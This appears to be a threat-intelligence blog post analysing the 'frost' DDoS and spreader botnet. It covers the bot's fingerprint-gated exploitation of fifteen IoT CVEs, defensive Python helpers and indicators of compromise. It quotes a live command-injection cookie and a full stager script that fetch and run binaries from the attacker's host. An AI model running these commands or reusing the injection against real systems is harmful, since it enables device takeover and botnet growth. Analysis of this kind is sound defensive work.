Key Takeaways
- frost, a DDoS and spreader tool, uses strict match conditions and only attempts exploitation when a target's responses match expected output, which is why our Canary Intelligence was able to surface this activity.
- VulnCheck Exploit & Vulnerability Intelligence links the CVEs used by frost to long-running botnets. Nearly all appear in the VulnCheck KEV but only four appear in the CISA KEV. CVE-2025-1610 is the only new one that appears in neither list.
- frost does not include the originally observed ICTBroadcast exploit (CVE-2025-2611), implying the operator has additional exploits beyond what appears in the binary.
About Frost
Starting on November 28, 2025 we began seeing new attacks on our ICTBroadcast CVE-2025-2611 canaries. The raw canary data looks like:
```json
{
  "src_ip": "87.121.84.52",
  "src_port": 55590,
  "src_country": "NL",
  "dst_country": "US",
  "cve": "CVE-2025-2611",
  "signature_id": 12700629,
  "signature": "VULNCHECK ICTBroadcast CVE-2025-2611 Exploit Attempt",
  "category": "Web Application Attack",
  "severity": 1,
  "payload": "R0VUIC9sb2dpbi5waHAgSFRUUC8xLjANCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBMaW51eCB4ODZfNjQ7IHJ2OjE0MC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzE0MC4wDQpDb29raWU6IEJST0FEQ0FTVD1gd2dldCR7SUZTfWh0dHA6Ly84Ny4xMjEuODQuNTIvbWlzYy5pY3Ricm9hZGNhc3Quc2gke0lGU30tTy18c2hgOyBpY3Ricm9hZGNhc3Q9YHdnZXQke0lGU31odHRwOi8vODcuMTIxLjg0LjUyL21pc2MuaWN0YnJvYWRjYXN0LnNoJHtJRlN9LU8tfHNoYA0KDQo=",
  "http": {
    "url": "/login.php",
    "http_user_agent": "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0",
    "protocol": "HTTP/1.0"
  },
  "timestamp": "2025-12-01T13:14:41.919Z"
}
```
Decoding the payload field reveals the attacker's exploit:
```http
GET /login.php HTTP/1.0
Host: VC_REDACTED
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Cookie: BROADCAST=`wget${IFS}http://87.121.84.52/misc.ictbroadcast.sh${IFS}-O-|sh`; ictbroadcast=`wget${IFS}http://87.121.84.52/misc.ictbroadcast.sh${IFS}-O-|sh`
```
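Decoding the payload field and pulling the injected commands out of the Cookie header is the sort of triage a canary record invites. The following is an added example written for this post (not VulnCheck's or the canary platform's own code): it base64-decodes a canary record, parses the request, and extracts every command substitution and stager URL from the cookie values. The record is constructed to mirror the one above, and the ${IFS} handling and URL tokenization are assumptions about how this operator writes payloads.

```python
import base64
import json
import re
# Constructed canary record modelled on the one shown above (only the fields this code reads)
CANARY_RECORD = json.dumps({
    "cve": "CVE-2025-2611",
    "payload": base64.b64encode(
        b"GET /login.php HTTP/1.0\r\n"
        b"Host: VC_REDACTED\r\n"
        b"Cookie: BROADCAST=`wget${IFS}http://87.121.84.52/misc.ictbroadcast.sh${IFS}-O-|sh`; "
        b"ictbroadcast=`wget${IFS}http://87.121.84.52/misc.ictbroadcast.sh${IFS}-O-|sh`\r\n\r\n"
    ).decode(),
})

# Backtick or $(...) command substitution inside a cookie value, and a URL token that stops
# at whitespace, shell operators and the start of ${IFS}
CMD_SUBST = re.compile(r"`([^`]+)`|\$\(([^)]+)\)")
URL_TOKEN = re.compile(r"https?://[^\s`$;|&]+")

def decode_payload(record_json):
    """Return (request line, headers dict with lower-cased names) from the base64 payload."""
    record = json.loads(record_json)
    raw = base64.b64decode(record["payload"]).decode("latin-1")
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def injected_commands(cookie_header):
    """(cookie name, command) pairs for every command substitution, with ${IFS} restored to a space."""
    found = []
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        for m in CMD_SUBST.finditer(value):
            cmd = (m.group(1) or m.group(2)).replace("${IFS}", " ")
            found.append((name, cmd))
    return found

def stager_urls(record_json):
    """Deduplicated stager URLs referenced by the injected commands, in order of appearance."""
    _, headers = decode_payload(record_json)
    urls = []
    for _, cmd in injected_commands(headers.get("cookie", "")):
        for url in URL_TOKEN.findall(cmd):
            if url not in urls:
                urls.append(url)
    return urls
```

Feeding real canary records through `stager_urls` gives a list of download locations to block or to pivot on in other datasets.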
As we covered in our earlier write-up, ICTBroadcast Command Injection Actively Exploited (CVE-2025-2611), exploitation runs through the Cookie field. Here the attacker pulls down a misc.ictbroadcast.sh script from the same host and executes it with sh. The script is the usual multi-architecture stager. The full script is shown below:
```sh
cd /tmp || cd /var/tmp || cd /var || cd /mnt || cd /dev || cd /
wget http://87.121.84.52/frost.armv7 -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.armv6 -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.armv5 -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.mips -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.mipsel -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.aarch64 -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.armv7b -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.x86 -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.x86_64 -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
rm misc.ictbroadcast.sh
```
The attacker downloads several architecture-specific versions of a binary they name frost, runs each one in turn, deletes them, and then deletes the stager.
The frost binary combines DDoS tooling with spreader logic that includes fourteen exploits for fifteen CVEs. The important part is how it spreads. The operator is not carpet-bombing the internet with exploits. frost checks the target first and only proceeds with exploitation when it sees the specific indicators it expects.
For example, frost will only exploit CVE-2025-1610 after first receiving an HTTP response to GET / that contains Set-Cookie: user=(null) and then a follow-on response to a second request that contains Set-Cookie: user=admin. If those markers are not there, it does nothing. If they are, it commits. This is the kind of selective behavior our canaries catch.
The table below shows how far this selectivity goes. Each exploit path has its own fingerprint checks, and frost will only run the exploit when those conditions match.
| Match Condition | CVE | Vendor |
|---|---|---|
| Basic realm="DVR" | CVE-2025-34132 | Lilin |
| Server: GoAhead-Webs + JS Content | CVE-2017-18377 | WifiCam |
| Set-Cookie: user=(null) + Set-Cookie: user=admin | CVE-2025-1610 | LBLink |
| Server: lighttpd | CVE-2025-34152 | Shenzhen Aitemi |
| Server: lighttpd | CVE-2023-46574 | TOTOLINK |
| Server: lighttpd | CVE-2022-40475 | TOTOLINK |
| AuthInfo: | CVE-2018-25126 | TVT |
| URL=/webpages/login.html | CVE-2023-1389 | TP-Link |
| Server: httpd_four-faith | CVE-2024-9644, CVE-2024-12856 | Four Faith |
| Server: Http Server | CVE-2020-10987 | Tenda |
| Location: /login.rsp | CVE-2024-3721 | TBK DVR |
| Server: FSM-Webs | CVE-2023-7311 | BYTEVALUE |
| Server: DWS | CVE-2024-12987 | Draytek |
| Server: jjhttpd | CVE-2021-45382 | D-Link |
Some match conditions are very specific, such as the two-step cookie check for CVE-2025-1610 and the CVE-2017-18377 check, which requires both the GoAhead-Webs banner and specific JavaScript content. Others are much looser: CVE-2022-40475, for example, only checks for a lighttpd server banner.
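To make the selectivity concrete from the defending side, here is an added example (not code from the post or from the frost binary) that evaluates a device's own HTTP responses against the fingerprints in the table and returns the CVEs a frost-style spreader would treat it as a candidate for, including the stateful two-response check for CVE-2025-1610. The Response class, the prefix comparison on the Server header, body matching for the TP-Link marker and the `<script` stand-in for the unspecified JavaScript check are assumptions, since the binary's exact comparisons are not reproduced on the page.

```python
from dataclasses import dataclass, field

@dataclass
class Response:
    """One HTTP response: a list of (name, value) header pairs plus the body text."""
    headers: list = field(default_factory=list)
    body: str = ""

    def get(self, name):
        """All values of a header, matched case-insensitively (Set-Cookie may repeat)."""
        return [v for n, v in self.headers if n.lower() == name.lower()]

# Server banner -> CVEs, taken from the match-condition table above
SERVER_BANNERS = {
    "lighttpd": ["CVE-2025-34152", "CVE-2023-46574", "CVE-2022-40475"],
    "httpd_four-faith": ["CVE-2024-9644", "CVE-2024-12856"],
    "Http Server": ["CVE-2020-10987"],
    "FSM-Webs": ["CVE-2023-7311"],
    "DWS": ["CVE-2024-12987"],
    "jjhttpd": ["CVE-2021-45382"],
}

def server_matches(server_values, banner):
    # Assumption: a prefix comparison on the Server header; the binary's exact test is not shown
    return any(v.strip().lower().startswith(banner.lower()) for v in server_values)

def frost_candidates(first, second=None):
    """CVEs whose fingerprint is satisfied by the response to GET / (and an optional follow-on)."""
    hits = []
    server = first.get("Server")
    for banner, cves in SERVER_BANNERS.items():
        if server_matches(server, banner):
            hits.extend(cves)
    if server_matches(server, "GoAhead-Webs") and "<script" in first.body.lower():
        hits.append("CVE-2017-18377")  # assumption: stands in for the unspecified JS content check
    if any('basic realm="dvr"' in v.lower() for v in first.get("WWW-Authenticate")):
        hits.append("CVE-2025-34132")
    if first.get("AuthInfo"):
        hits.append("CVE-2018-25126")
    if "url=/webpages/login.html" in first.body.lower():  # assumption: marker sits in the body
        hits.append("CVE-2023-1389")
    if any(v.strip().lower().startswith("/login.rsp") for v in first.get("Location")):
        hits.append("CVE-2024-3721")
    # CVE-2025-1610 is stateful: user=(null) on the first response, user=admin on the second
    if second is not None:
        if any("user=(null)" in c for c in first.get("Set-Cookie")) and \
           any("user=admin" in c for c in second.get("Set-Cookie")):
            hits.append("CVE-2025-1610")
    return hits
```

A lighttpd banner alone lines the device up for three exploit paths, while the LBLink path needs both responses in the right order, which is exactly the difference between the loose and strict checks described above.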
Each exploit works in a similar way. Successful exploitation downloads a stager script, and the stager retrieves the secondary binary (a DDoS and spreader tool, frost). The attacker has named each stager according to the exploited target. For example, CVE-2023-7311 uses router.bytevalue-rep.sh and CVE-2025-34132 uses dvr.lilin-rep.sh. All of them follow the same <host-type>.<vendor>-rep.sh naming pattern. Even the ICTBroadcast path follows this format with misc.ictbroadcast.sh.

The table below summarizes all fourteen stager names and their associated CVEs.
| CVE | Stager Name |
|---|---|
| CVE-2025-2611 | misc.ictbroadcast.sh |
| CVE-2025-34132 | dvr.lilin-rep.sh |
| CVE-2017-18377 | ipcam.goahead-rep.sh |
| CVE-2025-1610 | router.lblink-rep.sh |
| CVE-2025-34152 | router.aitemi-rep.sh |
| CVE-2023-46574 | router.totolink-rep.sh |
| CVE-2022-40475 | router.totolink2-rep.sh |
| CVE-2018-25126 | dvr.tvt-rep.sh |
| CVE-2023-1389 | router.tplink-rep.sh |
| CVE-2024-9644, CVE-2024-12856 | router.faith-rep.sh |
| CVE-2020-10987 | router.tenda-rep.sh |
| CVE-2024-3721 | dvr.tbk-rep.sh |
| CVE-2023-7311 | router.bytevalue-rep.sh |
| CVE-2024-12987 | router.draytek-rep.sh |
| CVE-2021-45382 | router.dlink-rep.sh |
This naming scheme allows us to query honeypot datasets such as SANS Web Honeypot Data for related activity. As of this writing, none of the stager names appear in the SANS urlsummary.txt feed. This is consistent with the operator's behavior. The stagers are only delivered to targets that satisfy the match conditions, and some of our canaries fall into that category.
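A hunt for that naming scheme in a honeypot URL feed can be written as a short filter. This is an added example, not VulnCheck's query or the SANS feed format: the feed lines are constructed in a "count, tab, URL" shape, and the regular expression encodes the <host-type>.<vendor>-rep.sh pattern with the -rep suffix optional so that misc.ictbroadcast.sh also matches.

```python
import re
from urllib.parse import urlsplit

# <host-type>.<vendor>-rep.sh, with "-rep" optional (misc.ictbroadcast.sh lacks it)
STAGER_NAME = re.compile(r"^(?P<host_type>[a-z0-9]+)\.(?P<vendor>[a-z0-9]+)(?:-rep)?\.sh$")

# Constructed feed lines in a "count<TAB>url" shape; not real SANS data
SAMPLE_FEED = """\
12\thttp://203.0.113.9/router.tplink-rep.sh
3\thttp://203.0.113.9/misc.ictbroadcast.sh
40\thttp://198.51.100.4/setup.sh
7\thttp://198.51.100.4/cgi-bin/luci
1\thttp://203.0.113.9/dvr.lilin-rep.sh?x=1
"""

def stager_hits(feed_text):
    """Return (url, host_type, vendor) for URLs whose filename follows the frost naming scheme."""
    hits = []
    for line in feed_text.splitlines():
        fields = line.strip().split("\t")
        url = fields[-1] if fields else ""
        # Match on the path's last segment only, so query strings do not hide a hit
        filename = urlsplit(url).path.rsplit("/", 1)[-1].lower()
        m = STAGER_NAME.match(filename)
        if m:
            hits.append((url, m.group("host_type"), m.group("vendor")))
    return hits
```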
Beyond the stagers and match conditions, the vulnerability set itself is notable. Only four of the CVEs targeted by frost are included in the CISA Known Exploited Vulnerabilities catalog (CVE-2020-10987, CVE-2021-45382, CVE-2023-1389, and CVE-2024-12987). At the time of discovery, all but one appeared in the free VulnCheck KEV. The remaining CVE, CVE-2025-1610, is unusual because VulnCheck Exploit and Vulnerability Intelligence currently indexes only a single proof of concept for it, and that PoC is a Notion document. No Nuclei template or Metasploit module exists for it, yet the implementation in frost matches the Notion document precisely.
The corresponding implementation inside frost is shown in the disassembly below.

VulnCheck Exploit and Vulnerability Intelligence links the remaining CVEs to nineteen different botnets, including IZ1H9, Beastmode, RustoBot, RondoDox, Mirai, ShadowV2, AISURU, Moobot, Gitpaste-12, BotenaGo, Zerobot, Gayfemboy, Ballista, Skibidi, XoRBot, Androxgh0st, Condi, AGoent, and Gafgyt. In other words, this operator is not working new or unexplored ground. They are using the same vulnerabilities that many other botnets rely on. Most of these CVEs are also not in the CISA KEV, which highlights how much active exploitation activity occurs outside that list.
Our IP Intelligence data shows that the number of internet-exposed systems vulnerable to these bugs is small. Across the vulnerabilities we track, the global population is under ten thousand. This limits how large a botnet built on these CVEs can get, which makes this operator a relatively small player. It also highlights something interesting about this campaign. The frost binary does not contain the ICTBroadcast exploit that was used to deliver it in the first place, so the operator clearly has additional exploits in rotation that are not present in the sample. The table below breaks the population out by CVE.
| CVE | Vendor | IP Intel Count |
|---|---|---|
| CVE-2025-2611 | ICTBroadcast | 10 |
| CVE-2025-34152 | Shenzhen Aitemi | 195 |
| CVE-2023-1389 | TP-Link | 5525 |
| CVE-2024-9644, CVE-2024-12856 | Four-Faith | 288 |
| CVE-2020-10987 | Tenda | 526 |
| CVE-2024-3721 | TBK | 937 |
| CVE-2023-7311 | BYTEVALUE | 1 |
| CVE-2024-12987 | Draytek | 362 |
With the victim side mapped out, we can look at the operator's footprint online.
The canary-observed activity originates from 87.121.84.52. This host is launching the exploitation attempts and also serves the stager scripts and the frost binaries over HTTP on port 80. Inside the binary we see references to three domains that resolve to this same IP: krebs.strangled.net, mreow.jumpingcrab.com, and xlab.ignorelist.com. Shodan shows the host exposing additional exploit-related behavior on TCP port 2, which matches what we see in our canaries and strongly suggests that 87.121.84.52 is the operator's primary system.

We also saw a second host, 176.65.148.246, that may be related. Shodan shows that host also using the same 220 meow :3 banner seen on the primary host, giving it a loose connection to the same operator. That link is slightly strengthened by similar exploit behavior reported in AbuseIPDB.

Taken together, the evidence points to a small, targeted operation. The vulnerable population is small, as shown by our IP Intelligence data, and the strict match conditions inside frost allow the operator to avoid most honeypots. The CVEs themselves are well-known. VulnCheck Exploit & Vulnerability Intelligence associates them with numerous botnets, and while most do not appear in the CISA KEV, nearly all are included in the free VulnCheck KEV. Notably, the ICTBroadcast exploit that delivered this sample does not appear in the binary, which indicates the operator has additional capabilities not visible here. Our canaries revealed this activity because they emulate the expected behavior of real systems.
About VulnCheck
VulnCheck’s research team tracks real-world exploitation, attacker infrastructure, and exploit workflows using our Canary Intelligence, Exploit & Vulnerability Intelligence (EVI), and IP Intelligence datasets. The analysis in this blog draws directly on those capabilities: Canary Intelligence surfaced the selective exploitation behavior, EVI linked the CVEs to known botnets, and IP Intelligence identified the actual population of exposed hosts.
For more research like this, check out our blogs: The Mystery OAST Host Behind a Regionally Focused Exploit Operation, XWiki Under Increased Attack, and ICTBroadcast Command Injection Actively Exploited (CVE-2025-2611).
Sign up for the VulnCheck community today to get free access to our VulnCheck KEV, enjoy our comprehensive vulnerability data, and request a trial of our Initial Access Intelligence, IP Intelligence, Canary Intelligence, and Exploit & Vulnerability Intelligence products.
Indicators
IP Addresses:
- 87.121.84.52 - Scanning, exploitation, and hosting
- 176.65.148.246 - Potentially related scanning
Domains:
- krebs.strangled.net
- mreow.jumpingcrab.com
- xlab.ignorelist.com
Hashes (SHA-1)